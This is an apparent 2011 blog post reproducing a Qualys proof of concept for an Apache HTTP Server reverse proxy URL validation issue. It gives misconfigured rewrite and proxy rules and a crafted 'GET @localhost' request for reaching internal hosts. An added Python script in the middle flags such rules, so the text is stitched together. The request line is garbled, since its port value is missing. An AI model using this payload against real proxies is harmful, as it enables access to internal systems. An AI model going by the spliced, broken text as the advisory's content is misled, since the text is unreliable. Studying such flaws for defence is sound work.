Sunday, 27 November 2011

Apache HTTP Server Reverse Proxy/Rewrite URL Validation Issue By Qualys


Proof of Concepts


Target:
Fully patched Apache Web Server (Version 2.2.21) with CVE-2011-3368
patch applied, with a reverse proxy set up and incorrectly configured
RewriteRule/ProxyPassMatch rules.


Rewrite rules in httpd.conf:
RewriteRule ^(.*) http://10.40.2.159$1
ProxyPassMatch ^(.*) http://10.40.2.159$1
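Both rules above append the captured request path ($1) directly to the backend host with no "/" between them, which is the misconfiguration the target description refers to. The following is an added example, not part of the original advisory: a small Python check that flags such rules in a configuration file. The function name audit and the sample configuration (including the two hardened rules, which anchor the pattern at "/" and put a "/" before $1) are assumptions made for illustration.

```python
import re

# Directives from the page whose backend URL is built from a regex capture.
DIRECTIVE = re.compile(r'^\s*(RewriteRule|ProxyPassMatch)\s+(\S+)\s+(\S+)', re.I)

# scheme://authority followed immediately by a backreference ($1, ${1}, ...)
# with no "/" separating the host part from the captured text.
UNSEPARATED = re.compile(r'^[a-z][a-z0-9+.-]*://[^/$\s]*\$\{?\d', re.I)


def audit(conf_text):
    """Return (line number, directive, target) for each rule whose
    substitution lets captured request data continue the authority part."""
    findings = []
    for lineno, line in enumerate(conf_text.splitlines(), 1):
        if line.lstrip().startswith('#'):
            continue  # skip comment lines
        m = DIRECTIVE.match(line)
        if not m:
            continue
        directive, _pattern, target = m.groups()
        if UNSEPARATED.match(target):
            findings.append((lineno, directive, target))
    return findings


# Constructed sample: lines 2-3 are the rules shown on this page,
# lines 4-5 are hardened forms (assumed for this example).
SAMPLE = """\
# reverse proxy rules
RewriteRule ^(.*) http://10.40.2.159$1
ProxyPassMatch ^(.*) http://10.40.2.159$1
RewriteRule ^/(.*) http://10.40.2.159/$1 [P]
ProxyPassMatch ^/(.*) http://10.40.2.159/$1
"""

if __name__ == "__main__":
    for lineno, directive, target in audit(SAMPLE):
        print(f"line {lineno}: {directive} target '{target}' "
              f"has no '/' between host and backreference")
```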



Example 1:
GET @localhost:: HTTP/1.0\r\n\r\n
where is any port
